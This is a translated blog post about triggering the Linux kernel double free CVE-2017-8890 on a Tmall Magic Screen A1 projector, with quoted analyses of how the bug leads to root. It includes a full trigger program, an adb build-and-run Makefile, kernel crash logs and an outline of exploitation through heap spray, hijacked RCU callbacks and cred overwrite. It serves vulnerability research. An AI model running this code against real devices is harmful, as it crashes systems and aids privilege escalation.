Taken from open source, shared back to open source: rooting the Tmall Magic Screen A1 (天猫魔屏A1) with CVE-2017-8890

I used to think well of Alibaba's products, but a boot-up advertisement on this one device used up all of that goodwill.

When I bought it there was no boot ad at all; after three months of use, a system update brought one. So an "upgrade" means growing a boot ad? I filed a complaint right away.

And what came of it? At most they fixed the part I raised about "the boot ad is loud enough to startle you and its volume cannot be adjusted"; the ad itself stayed.

Even though it was only four or five months old and still fairly new, I took it apart, set it aside, and threw it out as junk when I moved.

So much for Alibaba!

I stumbled on my old notes again, and since they are just sitting there, I might as well share them.

(Since this is a share of earlier notes, I am not marking the quoted parts up front; the links to the original articles are given in the text.)

Thanks are due to the experts who shared their work, and to the authors of the PoC and exploit code. Taken from open source, shared back to open source!

[Screenshot of the earlier successful root, placed here at the top.]

-------------------------------------------------------------------------------------------------

I. Description

+ ID: CVE-2017-8890

+ Type: double free

+ Location: kernel/net/ipv4/inet_connection_sock.c

+ Description:

The patch for CVE-2017-8890 is shown below (the diff was an image in the original; the single added line is quoted in the code further down):

The patch is tiny: it adds one line that sets inet_sk(newsk)->mc_list to NULL. Combined with the vulnerability class, double free, it is easy to infer that the release path mishandles the mc_list structure, and that this is what produces the bug.

(The "Reproduction" and "Exploitation" sections below are taken from the FreeBuf article:)

CVE-2017-8890漏洞分析与利用(Root Android 7.x) (CVE-2017-8890 analysis and exploitation, rooting Android 7.x), FreeBuf网络安全行业门户

Reproduction:

Tracing the callers of the patched function inet_csk_clone_lock gives the call chain shown in the figure below:

The chain originates in tcp_v4_rcv, which processes the TCP three-way handshake. When the handshake completes and the connection is actually established, a new socket object is created, so the problem lies in how that new socket is created. The code is as follows:

```c
struct sock *inet_csk_clone_lock(const struct sock *sk, const struct request_sock *req,
                                 const gfp_t priority)
{
    struct sock *newsk = sk_clone_lock(sk, priority);

    if (newsk) {
        // ...
        // cve-2017-8890 patch
        // inet_sk(newsk)->mc_list = NULL;
        // ...
    }
    // ...
}

struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority)
{
    newsk = sk_prot_alloc(sk->sk_prot, priority, sk->sk_family);
    if (newsk != NULL) {
        sock_copy(newsk, sk);
        // newsk init...
    }
    return newsk;
}

static void sock_copy(struct sock *nsk, const struct sock *osk)
{
#ifdef CONFIG_SECURITY_NETWORK
    void *sptr = nsk->sk_security;
#endif
    memcpy(nsk, osk, offsetof(struct sock, sk_dontcopy_begin));

    memcpy(&nsk->sk_dontcopy_end, &osk->sk_dontcopy_end,
           osk->sk_prot->obj_size - offsetof(struct sock, sk_dontcopy_end));

#ifdef CONFIG_SECURITY_NETWORK
    nsk->sk_security = sptr;
    security_sk_clone(osk, nsk);
#endif
}
```

Before the new socket is initialised, sock_copy is called to copy the parent socket's data into it, producing a replica of the parent sock. The initialisation that follows never resets mc_list, so the parent's mc_list object ends up referenced by the new socket as well. Create several children and the object is referenced several times, and finally freed several times.

The next question is how to create a socket that carries an mc_list object. Searching the source for every reference to mc_list, the final caller is shown in the figure below:

ip_mc_join_group adds a socket to a multicast group; it is reached through the ip_setsockopt interface.

Since the bug is a double free, the object must be freeable more than once. With the creation path of mc_list in hand, the release path of the object is shown in the figure below:

The bug can then be reproduced with the following pseudocode:

```c
sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, IPPROTO_IP);
setsockopt(sockfd, SOL_IP, MCAST_JOIN_GROUP, &group, sizeof(group));
/* ... bind(), listen(), and two client connect()s ... */
accept_sockfd1 = accept(sockfd, (struct sockaddr *)&accept1_si, &accept1_len);
accept_sockfd2 = accept(sockfd, (struct sockaddr *)&accept2_si, &accept2_len);
// first free
close(accept_sockfd1);
// second free
close(accept_sockfd2);
```

The crash output is as follows:

```text
[35890.702474] ------------[ cut here ]------------
[35890.702509] kernel BUG at /usr/local/google/buildbot/src/partner-android/n-dev-msm-angler-3.10-nyc-mr2/private/msm-huawei/mm/slub.c:3364
[35890.702518] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP
[35890.702539] CPU: 0 PID: 8 Comm: rcuc/0 Not tainted 3.10.73-g5b0be8f02fe #1
[35890.702548] task: ffffffc00e9a4b40 ti: ffffffc00e9dc000 task.ti: ffffffc00e9dc000
[35890.702576] PC is at kfree+0xe8/0x1e0
[35890.702594] LR is at rcu_do_batch.isra.35+0x118/0x2b4
[35890.702602] pc : [<ffffffc00030240c>] lr : [<ffffffc000299ab8>] pstate: 40000145
[35890.702608] sp : ffffffc00e9dfc90
```


```text
[35890.703639] Process rcuc/0 (pid: 8, stack limit = 0xffffffc00e9dc058)
[35890.703647] Call trace:
[35890.703658] [<ffffffc00030240c>] kfree+0xe8/0x1e0
[35890.703667] [<ffffffc000299ab4>] rcu_do_batch.isra.35+0x114/0x2b4
[35890.703674] [<ffffffc000299dfc>] rcu_cpu_kthread+0x1a8/0x308
[35890.703688] [<ffffffc00024baec>] smpboot_thread_fn+0x1dc/0x208
[35890.703703] [<ffffffc000243e7c>] kthread+0xc0/0xcc
[35890.703713] Code: 37380180 f9400260 f272041f 54000041 (e7f001f2)
[35890.703724] ---[ end trace bc62c72cba08ddfd ]---
[35890.723573] Kernel panic - not syncing: Fatal exception in interrupt
[35890.723810] CPU1: stopping
```

The root cause is simple: when the object is copied, the pointer is copied along with it, so two pointers refer to the same object. The fix is equally simple: set the mc_list pointer to NULL when the object is copied.

Exploitation

Hijacking EIP

The exploitation idea is direct: heap-spray to reclaim the freed slot before the second free.

The mc_list object is allocated from the slab allocator:

```c
int ip_mc_join_group(struct sock *sk, struct ip_mreqn *imr)
{
    // ...
    iml = sock_kmalloc(sk, sizeof(*iml), GFP_KERNEL);
    // ...
}
```

The corresponding assembly:

```asm
ROM:FFFFFFC000BABD6C loc_FFFFFFC000BABD6C          ; CODE XREF: ip_mc_join_group+98j
ROM:FFFFFFC000BABD6C     MOV     X0, X20
ROM:FFFFFFC000BABD70     MOV     W1, #0x30
ROM:FFFFFFC000BABD74     MOV     W2, #0xD0
ROM:FFFFFFC000BABD78     BL      sock_kmalloc
```

So the object is 0x30 bytes and lives in the 64-byte slab (slab-64); spraying 64-byte objects is therefore enough.

After reclaiming the slot we need to hijack EIP, so the spray must land on a function pointer inside the object. The mc_list structure looks like this:

```c
struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
};
#define rcu_head callback_head

struct ip_mc_socklist {
    struct ip_mc_socklist __rcu *next_rcu;
    struct ip_mreqn multi;
    unsigned int sfmode;
    struct ip_sf_socklist __rcu *sflist;
    struct rcu_head rcu;
};
```

The structure contains a callback, func; overwriting this function pointer hijacks EIP. func is processed while the object is being released:

```c
void ip_mc_drop_socket(struct sock *sk)
{
    // ...
    if (!inet->mc_list)
        return;

    rtnl_lock();
    while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
        // ...
        kfree_rcu(iml, rcu);
    }
    rtnl_unlock();
}
```

Once this function has obtained the mc_list object it calls kfree_rcu, which does not free the object immediately. Instead it calls call_rcu to record the object to be deleted and marks or starts a grace period; when the CPU's grace period ends, an RCU softirq fires and the actual release happens then. If a callback func is present, the callback path is taken instead. The overall call sequence is:

kfree_rcu -> … -> call_rcu -> … -> invoke_rcu_core -> RCU_SOFTIRQ -> rcu_process_callbacks -> … __rcu_reclaim

The final release code is:

```c
#define __is_kfree_rcu_offset(offset) ((offset) < 4096)

static inline bool __rcu_reclaim(const char *rn, struct rcu_head *head)
{
    unsigned long offset = (unsigned long)head->func;

    rcu_lock_acquire(&rcu_callback_map);
    // is func a kfree offset, or a real callback?
    if (__is_kfree_rcu_offset(offset)) {
        RCU_TRACE(trace_rcu_invoke_kfree_callback(rn, head, offset));
        kfree((void *)head - offset);
        rcu_lock_release(&rcu_callback_map);
        return true;
    } else {
        RCU_TRACE(trace_rcu_invoke_callback(rn, head));
        head->func(head);
        rcu_lock_release(&rcu_callback_map);
        return false;
    }
}
```

[The corresponding assembly was an image in the original.]

When there is no real callback, func holds the offset of the rcu member within the object, i.e. 0x20. Once func is outside that range (4096 or more, so __is_kfree_rcu_offset fails), the callback path is taken, which is what hijacks EIP.
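The following is an added example, not code from the original post or from the kernel: a user-space C model of the mechanism described in the sections above. It mirrors the ip_mc_socklist layout with the same member order (a local model_ip_mreqn stands in for struct ip_mreqn, and model_sock for the one relevant field of struct sock; layout_matches_post, tracked_kfree and extra_reclaims are names chosen here), clones a socket by byte copy the way sock_copy does, with and without the one-line patch, and models kfree_rcu/__rcu_reclaim with a tracker that counts a second reclaim of the same chunk instead of performing it. It assumes an LP64 target so the sizes match the 0x30 and 0x20 values quoted above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
};
#define rcu_head callback_head
/* Same layout as the kernel's struct ip_mreqn: two IPv4 addresses and an ifindex. */
struct model_ip_mreqn { uint32_t imr_multiaddr, imr_address; int imr_ifindex; };
/* Member order of the kernel's struct ip_mc_socklist, __rcu annotations dropped. */
struct ip_mc_socklist {
    struct ip_mc_socklist *next_rcu;
    struct model_ip_mreqn multi;
    unsigned int sfmode;
    void *sflist;
    struct rcu_head rcu;
};

/* The post reads 0x30 off the sock_kmalloc call and puts rcu at 0x20 (LP64 ABI). */
int layout_matches_post(void)
{
    return sizeof(struct ip_mc_socklist) == 0x30 && offsetof(struct ip_mc_socklist, rcu) == 0x20;
}

/* Slab stand-in: remember reclaimed chunks so a second reclaim is counted, not performed. */
#define MAX_TRACKED 16
static void *reclaimed[MAX_TRACKED];
static int reclaimed_count, double_free_count;
static void tracked_kfree(void *obj)
{
    for (int i = 0; i < reclaimed_count; i++)
        if (reclaimed[i] == obj) { double_free_count++; return; }
    if (reclaimed_count < MAX_TRACKED) reclaimed[reclaimed_count++] = obj;
}

/* kfree_rcu(iml, rcu): the member offset, not a function pointer, goes into func. */
#define __is_kfree_rcu_offset(offset) ((offset) < 4096)
static struct callback_head *pending;           /* stands in for the real RCU callback batch */

static void model_kfree_rcu(struct ip_mc_socklist *iml)
{
    iml->rcu.func = (void (*)(struct callback_head *))(uintptr_t)offsetof(struct ip_mc_socklist, rcu);
    iml->rcu.next = pending;
    pending = &iml->rcu;
}

/* __rcu_reclaim() over the queue: a small func value is a kfree offset, anything else is called. */
static void model_rcu_do_batch(void)
{
    while (pending) {
        struct callback_head *head = pending;
        unsigned long offset = (unsigned long)head->func;
        pending = head->next;
        if (__is_kfree_rcu_offset(offset))
            tracked_kfree((char *)head - offset);
        else
            head->func(head);
    }
}

/* Only the fields of struct sock / inet_sock that matter here. */
struct model_sock { int fd; struct ip_mc_socklist *mc_list; };

/* sk_clone_lock()/sock_copy(): the child is a byte copy of the parent and inherits mc_list;
 * `patched` applies the one-line fix from the CVE-2017-8890 commit. */
static struct model_sock clone_sock(const struct model_sock *parent, int fd, int patched)
{
    struct model_sock child;
    memcpy(&child, parent, sizeof(child));
    child.fd = fd;
    if (patched)
        child.mc_list = NULL;              /* inet_sk(newsk)->mc_list = NULL; */
    return child;
}

/* ip_mc_drop_socket(): on close(), queue every entry of the list for reclaim. */
static void drop_socket(struct model_sock *sk)
{
    struct ip_mc_socklist *iml;
    while ((iml = sk->mc_list) != NULL) {
        sk->mc_list = iml->next_rcu;       /* in the buggy case this reads an already reclaimed chunk */
        model_kfree_rcu(iml);
    }
}

/* The post's scenario: a listener that joined a group, two accept()ed children, all three closed.
 * Returns how many times the single ip_mc_socklist object was reclaimed again after its first reclaim. */
int extra_reclaims(int patched)
{
    struct ip_mc_socklist *iml = calloc(1, sizeof(*iml));
    struct model_sock listener = { 3, iml };
    struct model_sock child1 = clone_sock(&listener, 4, patched);
    struct model_sock child2 = clone_sock(&listener, 6, patched);
    reclaimed_count = double_free_count = 0;
    drop_socket(&child1);   model_rcu_do_batch();   /* close(4): first reclaim */
    drop_socket(&child2);   model_rcu_do_batch();   /* close(6): same chunk again when unpatched */
    drop_socket(&listener); model_rcu_do_batch();   /* close(3) */
    free(iml);
    return double_free_count;
}
```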

[Diagram of the final exploit flow in the original.]

[Crash output after hijacking EIP, shown as a figure in the original.]

Even with EIP hijacked, the early Android privilege-escalation route of simply returning into user mode (ret2user) no longer works: PXN has long been enabled, so a JOP chain is needed to bypass it. Building JOP requires control of at least one register, but the argument the callback receives is head, i.e. the address of ip_mc_socklist.rcu, a kernel address whose contents we do not control; the value of x0 in the crash output confirms this. At this point the bug still cannot be exploited effectively.

Controlling register contents

Digging further into the mc_list release path shows that ip_mc_socklist holds another important pointer, next_rcu, which in the kernel points to the next ip_mc_socklist object; the release loop in ip_mc_drop_socket walks this list until next_rcu == NULL. Part of the code:

```c
void ip_mc_drop_socket(struct sock *sk)
{
    rtnl_lock();
    while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
        inet->mc_list = iml->next_rcu;
        kfree_rcu(iml, rcu);
    }
    rtnl_unlock();
}
```

So we can forge an ip_mc_socklist object, fake_iml, in user space and use the heap spray so that the first freed ip_mc_socklist has next_rcu = fake_iml. When the kernel processes fake_iml, the func(head) it eventually calls is entirely under our control, and head now points into user space, so x0 is controlled as well. The final flow is illustrated below:

[Exploit flow diagram in the original.]

With EIP and x0 controlled, a JOP chain handles the rest of the privilege escalation; the procedure is fairly standard and not detailed here. The final result is shown in the figure below; the test device was a Nexus 6P running 7.12.

[Screenshot of the final exploit result in the original.]


II. Trigger test

+ Device: Tmall Magic Screen A1, Android 5.1.1, Linux localhost 3.14.29 #1 SMP PREEMPT armv7l GNU/Linux

+ Confirmed so far: the bug is present in linux-3.14 (versions below 4.10 are affected), but it is not yet clear whether it has been patched on the Magic Screen A1.

+ Reference 1: [原创] CVE-2017-8890 深度分析 (看雪论坛, bbs.pediy.com)

+ Reference 2: [原创] CVE-2017-8890 漏洞利用 (root nexus6p@kernel 3.10) (看雪论坛, bbs.pediy.com)

Test program:

```c
/*
 * CVE-2017-8890
 * This is a double free vulnerability found by Pray3r using syzkaller from TYA.
 *
 * -> entry_SYSCALL_64_fastpath() -> SyS_setsockopt() -> SYSC_setsockopt()
 * -> sock_common_setsockopt() -> tcp_setsockopt()
 * -> ip_setsockopt() -> do_ip_setsockopt() -> do_ip_setsockopt()
 * -> ip_mc_join_group() -> sock_kmalloc() -> [...]
 */

/* to use accept4 */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define TEST_PORT 45555

static int cpu_num;
static int svr_sockfd;
static struct sockaddr_in svr_addr;
/* Flags shared between the two threads; volatile so the busy-wait loops
 * below re-read them instead of being optimised into infinite loops. */
static volatile int svr_ready;
static int cli_sockfd[2];
static volatile int cli_finish;

/* Client thread: connects to the listening socket twice, so that accept()
 * on the server side produces two child sockets cloned from the parent. */
static void *cli_thread(void *arg)
{
    int i = 0, sockfd = -1;
    struct sockaddr_in svraddr;

    (void)arg;
    printf("%s: UID=%u, EUID=%u, GID=%u\n", __func__,
           getuid(), geteuid(), getgid());

    while (!svr_ready)
        usleep(1);

    memset(&svraddr, 0, sizeof(svraddr));
    svraddr.sin_family = AF_INET;
    svraddr.sin_port = htons(TEST_PORT);
    svraddr.sin_addr.s_addr = inet_addr("127.0.0.1");

    for (i = 0; i < 2; i++) {
        sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, IPPROTO_IP);
        if (sockfd < 0) {
            printf("create client[%d] socket err: %s\n", i, strerror(errno));
            continue;
        }
        printf("create client[%d] socket ok: fd %d\n", i, sockfd);

        if (connect(sockfd, (struct sockaddr *)&svraddr, sizeof(svraddr)) < 0) {
            printf("client[%d] connect server err: %s\n", i, strerror(errno));
            close(sockfd);
            continue;
        }
        printf("client[%d] connect server ok\n", i);
        close(sockfd);
    }

    printf("client thread exit\n");
    cli_finish = 1;
    pthread_exit(0);
}

int main(int argc, char *argv[])
{
    struct sockaddr_in addr;
    struct group_req req;
    pthread_t tid;
    int i = 0, ret;

    (void)argc;
    /* print info */
    cpu_num = sysconf(_SC_NPROCESSORS_CONF);
    setbuf(stdout, NULL);
    printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
    printf("Program %s: UID=%u, EUID=%u, GID=%u\n", argv[0],
           getuid(), geteuid(), getgid());

    /* ------------------------------------------------------- */
    svr_sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, IPPROTO_IP);
    if (svr_sockfd < 0) {
        printf("create server socket err: %s\n", strerror(errno));
        return 0;
    }
    printf("create server socket %d ok\n", svr_sockfd);

    /* Joining a multicast group is what allocates the ip_mc_socklist
     * (mc_list) object that the accepted children will inherit. */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(TEST_PORT);
    addr.sin_addr.s_addr = inet_addr("224.0.0.0"); // multicast address
    memset(&req, 0, sizeof(req));
    req.gr_interface = 1;
    memcpy(&req.gr_group, &addr, sizeof(addr));
    if (setsockopt(svr_sockfd, SOL_IP, MCAST_JOIN_GROUP, &req, sizeof(req)) < 0) {
        printf("set server socket join group err: %s\n", strerror(errno));
        goto end;
    }
    printf("server socket join group ok\n");

    memset(&svr_addr, 0, sizeof(svr_addr));
    svr_addr.sin_family = AF_INET;
    svr_addr.sin_port = htons(TEST_PORT);
    svr_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    if (bind(svr_sockfd, (struct sockaddr *)&svr_addr, sizeof(svr_addr)) < 0) {
        printf("server socket bind port %u err: %s\n", TEST_PORT, strerror(errno));
        goto end;
    }
    printf("server socket bind port %u ok\n", TEST_PORT);

    if (listen(svr_sockfd, 2) < 0) {
        printf("server socket listen on port %u err: %s\n", TEST_PORT, strerror(errno));
        goto end;
    }
    printf("server socket listening on port %u\n", TEST_PORT);

    /* pthread_create() returns the error number directly rather than setting errno */
    ret = pthread_create(&tid, NULL, cli_thread, NULL);
    if (ret != 0) {
        printf("create client thread err: %s\n", strerror(ret));
        goto end;
    }
    printf("create client thread ok\n");
    svr_ready = 1;

    /* Each accept4() clones the listening socket, mc_list pointer included. */
    for (i = 0; i < 2; i++) {
        cli_sockfd[i] = accept4(svr_sockfd, NULL, NULL, 0);
        if (cli_sockfd[i] < 0) {
            printf("accept client[%d] err: %s\n", i, strerror(errno));
            goto end;
        }
        printf("accept client[%d] ok: fd %d\n", i, cli_sockfd[i]);
    }

    printf("wait client thread finish\n");
    while (!cli_finish)
        ;
    printf("client thread finished\n");

    /* Closing each child runs ip_mc_drop_socket on the same mc_list object. */
    printf("[*] now close client[0] fd %d\n", cli_sockfd[0]);
    close(cli_sockfd[0]);
    printf("[*] prepare close client[1] fd %d\n", cli_sockfd[1]);
    close(cli_sockfd[1]);

    printf("something ???\n");
    sleep(3);
    printf("nothing, to exit\n");

end:
    close(svr_sockfd);
    return 0;
}
```

Makefile:

```makefile
CROSS = $(shell pwd)/../toolchain_arch64
CROSS_COMPILE = $(CROSS)/bin/aarch64-linux-gnu-
CC = $(CROSS_COMPILE)gcc
STRIP = $(CROSS_COMPILE)strip

TARG = exp
OBJS = main.o
CFLAGS = -Wall
LDFLAGS = -static -pthread

all: $(TARG)

$(TARG): $(OBJS)
	$(CC) $^ $(LDFLAGS) -o $@
	$(STRIP) $@

%.o: %.c
	$(CC) -c $^ $(CFLAGS) -o $@

run: $(TARG)
	@adb connect 192.168.100.2
	@adb push $(TARG) /data/local/tmp/$(TARG) > /dev/null
	@adb shell 'chmod 777 /data/local/tmp/$(TARG)' > /dev/null
	@echo "----- run $(TARG) -----"
	@adb shell /data/local/tmp/$(TARG)
	@echo "----- run end -----"

clean:
	rm -rf *.o $(TARG)
```

Running the test with `make run`:

```text
already connected to 192.168.100.2:5555
----- run exp -----
CVE-2017-8890 exploit. cpu_num : 4
Program /data/local/tmp/exp: UID=2000, EUID=2000, GID=2000
create server socket 3 ok
server socket join group ok
server socket bind port 45555 ok
server socket listening on port 45555
create client thread ok
cli_thread: UID=2000, EUID=2000, GID=2000
create client[0] socket ok: fd 5
accept client[0] ok: fd 4
client[0] connect server ok
create client[1] socket ok: fd 5
accept client[1] ok: fd 6
wait client thread finish
client[1] connect server ok
client thread exit
client thread finished
[*] now close client[0] fd 4
[*] prepare close client[1] fd 6
something ???
nothing, to exit
----- run end -----
```

Debug serial output from the Magic Screen A1:

```text
shell@MagicProjector_A1:/ $ [ 76.575284] c0 1 (init) init: process 'dhcpcd_eth0', pid 3977 exited
[ 78.577487] c0 5629 (exp) Unable to handle kernel paging request at virtual address deeba000
[ 78.580489] c0 5629 (exp) pgd = ffffffc01815a000
[ 78.587658] [deeba000] *pgd=0000000000000000
[ 78.589677] c0 5629 (exp) Internal error: Oops: 96000005 [#1] PREEMPT SMP
[ 78.595796] Modules linked in: wlan(O) wlan_prealloc(O) mac80211 cfg80211(O) compat(O) dwc3 mali(O)
[ 78.604767] c0 5629 (exp) CPU: 0 PID: 5629 Comm: exp Tainted: G W O 3.14.29-00002-g9d3299d #1
[ 78.613907] c0 5629 (exp) task: ffffffc0225e1000 ti: ffffffc00c9ec000 task.ti: ffffffc00c9ec000
[ 78.622537] c0 5629 (exp) PC is at ip_mc_drop_socket+0x40/0xb4
[ 78.628310] c0 5629 (exp) LR is at ip_mc_drop_socket+0x94/0xb4
[ 78.634088] c0 5629 (exp) pc : [<ffffffc0017f8da4>] lr : [<ffffffc0017f8df8>] pstate: 80000145
[ 78.642626] c0 5629 (exp) sp : ffffffc00c9efd70
```


```text
[ 79.791303] c0 5629 (exp) Call trace:
[ 79.794929] c0 5629 (exp) [<ffffffc0017f8da4>] ip_mc_drop_socket+0x40/0xb4
[ 79.801743] c0 5629 (exp) [<ffffffc0017f2c60>] inet_release+0x5c/0xb0
[ 79.808126] c0 5629 (exp) [<ffffffc001738bb4>] sock_release+0x2c/0xa8
[ 79.814507] c0 5629 (exp) [<ffffffc001738c4c>] sock_close+0x1c/0x30
[ 79.820719] c0 5629 (exp) [<ffffffc0011bf5d4>] __fput+0x90/0x20c
[ 79.826668] c0 5629 (exp) [<ffffffc0011bf7c0>] ____fput+0x1c/0x2c
[ 79.832707] c0 5629 (exp) [<ffffffc0010c1718>] task_work_run+0x9c/0xf4
[ 79.839176] c0 5629 (exp) [<ffffffc001089314>] do_notify_resume+0x5c/0x74
[ 79.845903] c0 5629 (exp) Code: d0002fb7 910442d4 911502f7 b4000313 (f9400261)
[ 79.867535] c0 5629 (exp) ---[ end trace 44c6c94b3e38ba9c ]---
[ 79.877625] c0 5629 (exp) Kernel panic - not syncing: Fatal exception
```

Can we confirm that the bug was triggered?

The pediy post [原创] CVE-2017-8890 漏洞利用 (root nexus6p@kernel 3.10) (看雪论坛, bbs.pediy.com) notes:

The kernel panic is in ip_mc_drop_socket, and the PC is also inside the body of ip_mc_drop_socket.

Although I have worked with Linux for a long time, I have never dug into the kernel source and had never heard of the RCU mechanism, so right now I cannot tell whether what fired in ip_mc_drop_socket is this vulnerability.

For now I will assume that it is.
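As an added example that is not part of the original post, here is a small triage helper in C that parses a serial oops like the one above and checks the question just raised: whether the PC and the call trace sit in the mc_list release path (ip_mc_drop_socket reached from inet_release and sock_release during close()). The embedded log lines are quoted from the A1 serial output above with the register and memory dumps left out; oops_summary, parse_oops, has_frame, in_mc_list_release_path and a1_summary are names chosen here, and the check looks only at symbol names, never at addresses.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FRAMES 16
struct oops_summary {
    char pc_sym[64];              /* symbol from "PC is at <sym>+off/len" */
    unsigned long fault_addr;     /* from "Unable to handle kernel paging request at virtual address X" */
    int kernel_bug;               /* saw "kernel BUG at", as in the slub.c BUG_ON of the Nexus 6P dump */
    char frames[MAX_FRAMES][64];  /* symbols listed under "Call trace:" */
    int nframes;
};

/* Copy a symbol name, stopping at its "+off/len" suffix or at whitespace. */
static void copy_symbol(const char *src, char *dst, size_t cap)
{
    size_t n = strcspn(src, "+ \t\r");
    if (n >= cap) n = cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
}

/* Parse one serial/dmesg capture line by line. Returns 1 when a "PC is at" line was found. */
int parse_oops(const char *text, struct oops_summary *out)
{
    int in_trace = 0;
    memset(out, 0, sizeof(*out));
    while (*text) {
        const char *nl = strchr(text, '\n'), *p;
        size_t full = nl ? (size_t)(nl - text) : strlen(text);
        size_t len = full < 255 ? full : 255;   /* over-long lines are truncated, not split */
        char line[256];
        memcpy(line, text, len);
        line[len] = '\0';
        text += nl ? full + 1 : full;

        if ((p = strstr(line, "virtual address ")) != NULL)
            out->fault_addr = strtoul(p + strlen("virtual address "), NULL, 16);
        else if (strstr(line, "kernel BUG at "))
            out->kernel_bug = 1;
        else if ((p = strstr(line, "PC is at ")) != NULL)
            copy_symbol(p + strlen("PC is at "), out->pc_sym, sizeof(out->pc_sym));
        else if (strstr(line, "Call trace:"))
            in_trace = 1;
        else if (in_trace && strstr(line, "Code:"))
            in_trace = 0;                        /* the "Code:" line ends the trace */
        else if (in_trace && (p = strstr(line, ">] ")) != NULL && out->nframes < MAX_FRAMES)
            copy_symbol(p + 3, out->frames[out->nframes++], sizeof(out->frames[0]));
    }
    return out->pc_sym[0] != '\0';
}

int has_frame(const struct oops_summary *s, const char *sym)
{
    for (int i = 0; i < s->nframes; i++)
        if (strcmp(s->frames[i], sym) == 0) return 1;
    return 0;
}

/* The question the post asks: did the crash happen while close() was tearing down the
 * socket's multicast list, i.e. ip_mc_drop_socket reached through inet_release/sock_release? */
int in_mc_list_release_path(const struct oops_summary *s)
{
    return strcmp(s->pc_sym, "ip_mc_drop_socket") == 0 &&
           has_frame(s, "inet_release") && has_frame(s, "sock_release");
}

/* Lines quoted from the Magic Screen A1 serial log above (register and memory dumps omitted). */
const char *A1_OOPS =
    "[ 78.577487] c0 5629 (exp) Unable to handle kernel paging request at virtual address deeba000\n"
    "[ 78.589677] c0 5629 (exp) Internal error: Oops: 96000005 [#1] PREEMPT SMP\n"
    "[ 78.622537] c0 5629 (exp) PC is at ip_mc_drop_socket+0x40/0xb4\n"
    "[ 78.628310] c0 5629 (exp) LR is at ip_mc_drop_socket+0x94/0xb4\n"
    "[ 78.634088] c0 5629 (exp) pc : [<ffffffc0017f8da4>] lr : [<ffffffc0017f8df8>] pstate: 80000145\n"
    "[ 79.791303] c0 5629 (exp) Call trace:\n"
    "[ 79.794929] c0 5629 (exp) [<ffffffc0017f8da4>] ip_mc_drop_socket+0x40/0xb4\n"
    "[ 79.801743] c0 5629 (exp) [<ffffffc0017f2c60>] inet_release+0x5c/0xb0\n"
    "[ 79.808126] c0 5629 (exp) [<ffffffc001738bb4>] sock_release+0x2c/0xa8\n"
    "[ 79.814507] c0 5629 (exp) [<ffffffc001738c4c>] sock_close+0x1c/0x30\n"
    "[ 79.820719] c0 5629 (exp) [<ffffffc0011bf5d4>] __fput+0x90/0x20c\n"
    "[ 79.845903] c0 5629 (exp) Code: d0002fb7 910442d4 911502f7 b4000313 (f9400261)\n"
    "[ 79.877625] c0 5629 (exp) Kernel panic - not syncing: Fatal exception\n";

/* Parses the quoted log once; the returned summary is what the checks look at. */
const struct oops_summary *a1_summary(void)
{
    static struct oops_summary s;
    parse_oops(A1_OOPS, &s);
    return &s;
}

int main(void)
{
    const struct oops_summary *s = a1_summary();
    printf("PC in %s, fault address 0x%lx, %d trace frames\n", s->pc_sym, s->fault_addr, s->nframes);
    printf("mc_list release path: %s\n", in_mc_list_release_path(s) ? "yes" : "no");
    return 0;
}
```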

  1. Exploitation

  • With no mitigations, once EIP is controlled, jumping straight to user-mode shellcode is enough to get root.

  • With SMEP, the kernel cannot execute user-mode shellcode; kernel ROP combined with shellcode can still escalate.

  • With SMAP, the kernel cannot directly access user-mode data; ret2dir can be used to place the escalation code in kernel space and get root.

On Android phones the Linux kernel is relatively old, usually 3.10, but most devices enable PXN, so the kernel cannot execute user-mode shellcode. The approach is therefore to take control of the PC, modify addr_limit, and obtain arbitrary read/write of kernel memory from user mode. Having turned the double free into an arbitrary kernel read/write, the current process's cred structure is modified to escalate to root. SELinux, the kernel protection, is then patched, completing escalation to init privileges (init privileges are higher than root).

The result is shown below:

A PoC is not hard to implement; its usual impact is DoS, rebooting the server or the phone.

Escalating to root is much harder: the exploit is far more complex than the PoC, and the damage is greater, since data on the server or phone can then be stolen by an ordinary program or app.

[原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)

Controlling the PC

Jeremy's exploit already handles taking control of the PC. The approach was analysed in detail in the FreeBuf article by 云图信安 [1] (CVE-2017-8890漏洞分析与利用(Root Android 7.x)). Briefly: the server first initialises a socket carrying the vulnerable ip_mc_socklist object through the MCAST_JOIN_GROUP option of setsockopt; after the server socket is set to listen, a client thread connects twice, so the server's accept returns twice and the kernel copies the parent socket, producing two child sockets that each carry the vulnerable ip_mc_socklist object. When these two sockets are released, the ip_mc_socklist object is released twice. The release is done in ip_mc_drop_socket, which calls kfree_rcu to register a callback and waits for the callback to fire before the object is really freed. When the RCU grace period ends, the registered callback is invoked from the timer interrupt; it kfrees twice, which is the double free.

Note: before the second free of the ip_mc_socklist object, the kernel memory has already been released, so without a heap spray it may be reclaimed by some other allocation. ip_mc_leave_src, called from ip_mc_drop_socket, dereferences other pointers in the object, so a crash in ip_mc_leave_src is also normal. Either way, the crash is ultimately caused by the double free.

